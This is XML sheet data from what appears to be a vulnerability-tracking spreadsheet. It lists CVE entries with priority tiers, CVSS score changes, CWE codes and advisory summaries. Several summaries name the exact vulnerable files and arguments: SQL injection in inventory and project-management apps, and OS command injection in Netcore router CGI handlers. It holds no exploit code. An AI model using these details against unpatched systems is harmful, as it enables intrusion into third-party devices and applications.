      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in zhistaredu StarTraining up to 3.8.1. Affected by this issue is the function SysUser.isAdmin of the file edu-common/src/main/java/com/edu/common/core/domain/entity/SysUser.java of the component authRole Endpoint. The manipulation of the argument userId/roleIds leads to authorization bypass. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100878</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100883</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Krayin laravel-crm up to 2.2.5. The affected element is an unknown function of the file packages/Webkul/Admin/src/Config/acl.php. Executing a manipulation can lead to improper access controls. The attack can be launched remotely. The exploit has been published and may be used. Upgrading to version 2.2.6 is sufficient to fix this issue. This patch is called a399404a388d8ad2700a01349d0d98069c8e85a4. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100883</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100884</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-99</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Krayin laravel-crm up to 2.2.5. The impacted element is the function Storage::download of the file packages/Webkul/Admin/src/Config/acl.php of the component attachment-download Endpoint. The manipulation of the argument ID leads to improper control of resource identifiers. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.2.6 is sufficient to resolve this issue. The identifier of the patch is 13d6988cda8d69ece45ee1890effc90a7f21cdc1. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100884</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100887</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in amirsanni Mini-Inventory-and-Sales-Management-System up to 81bf0b55f5933f3b0dbb1583204a612e06605b95. The impacted element is the function order_by of the file DB_query_builder.php of the component Database Query Builder. Performing a manipulation of the argument orderBy results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project maintainer confirms: "I stopped maintaining that project for a while now, so I'm not sure it's worth fixing." This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100887</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100898</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in DevaslanPHP project-management 1.2.1/1.2.2/1.2.3/1.2.4/2.0.0-beta1. This affects the function whereRaw of the file app/Filament/Widgets/Timesheet/ActivitiesReport.php of the component Timesheet Dashboard. Performing a manipulation of the argument filter results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100898</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100899</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in DevaslanPHP project-management 1.2.1/1.2.2/1.2.3/1.2.4/v2.0.0-beta1. This impacts the function whereRaw of the file app/Filament/Widgets/Timesheet/MonthlyReport.php of the component Timesheet Dashboard. Executing a manipulation of the argument filter can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100899</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.5 → 2.0)</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100880</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in zhistaredu StarTraining up to 3.8.1. This vulnerability affects unknown code of the file du-common/src/main/java/com/edu/common/utils/file/MimeTypeUtils.java of the component Upload Endpoint. This manipulation of the argument File causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100880</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (2.6 → 1.2)</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100881</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in zhistaredu StarTraining up to 3.8.1. This issue affects some unknown processing of the file application.yml. Such manipulation of the argument xss.enabled leads to cross site scripting. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been disclosed publicly and may be used. Not independently exploitable: a defense-in-depth absence that amplifies CVE-2026-100880. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100881</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>Updated - Severity changed</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100655</t>
        </is>
      </c>
      <c r="D54" s="5" t="inlineStr"/>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="inlineStr"/>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD, Vulnrichment</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr"/>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100655</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>Updated - Severity changed</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100656</t>
        </is>
      </c>
      <c r="D55" s="5" t="inlineStr"/>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="inlineStr"/>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD, Vulnrichment</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr"/>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100656</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>Updated - Severity changed</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100657</t>
        </is>
      </c>
      <c r="D56" s="5" t="inlineStr"/>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="inlineStr"/>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr"/>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100657</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>Updated - Severity changed</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100658</t>
        </is>
      </c>
      <c r="D57" s="5" t="inlineStr"/>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="inlineStr"/>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr"/>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100658</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T57"/>
  <conditionalFormatting sqref="E2:E57">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57">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sheetData>
  <autoFilter ref="A1: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Updated - CVSS changed (9.5 → 9.8)</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88771</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Improper input validation vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to an unauthenticated attacker to execute arbitrary commands.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88771</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.5 → 8.1)</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88772</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to Remote Code Execution or Denial of Service</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88772</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T3"/>
  <conditionalFormatting sqref="E2:E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3">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7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CVE-2026-101072</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Netcore NR289-GE 1.4.5102. This issue affects the function system of the file /ap_ip.cgi of the component CGI Handler. Such manipulation of the argument ip leads to os command injection. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101072</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101076</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Netcore NR289-GE 1.4.5102. This affects the function system of the file /set_ntp_server_ip.cgi of the component CGI Handler. The manipulation of the argument ntp_ip results in os command injection. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101076</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101077</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
